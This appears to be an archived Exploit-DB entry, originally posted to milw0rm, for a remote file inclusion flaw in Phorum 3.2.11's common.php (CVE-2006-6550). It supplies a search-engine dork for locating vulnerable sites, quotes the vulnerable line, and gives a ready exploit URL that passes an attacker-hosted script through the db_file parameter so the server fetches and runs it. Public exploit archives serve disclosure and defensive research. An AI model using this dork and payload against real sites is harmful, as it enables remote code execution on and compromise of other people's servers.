Phorum 3.2.11 - 'common.php' Remote File Inclusion

Author: Mr-m07
type: webapps
platform: php
port: 
date_added: 2006-12-05 
date_updated: 2016-09-16 
verified: 1 
codes: OSVDB-35754;CVE-2006-6550 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphorum-3.2.11.zip

===========================================================
Yee7TeaM

WwW.Yee7.CoM
===========================================================

Software: Phorum v3.2.11

Vendor: http://www.phorum.org/

Download: http://skrypty.webpc.pl/pobierz274.html

Dork: "Copyright (C) 2000  Phorum Development Team"  and back form doc
folder :)

Description:

Line 31 of common.php

>
>>  // $db_file = './db/postgresql65.php';
>

Exploit: http://[localhost]/[paTh]/common.php?db_file=[Ev!lScript]


===========================================================
By: Mr-m07
Thanx To: ShockShadow & AL-SHIKH
WwW.Yee7.CoM
===========================================================

# milw0rm.com [2006-12-06]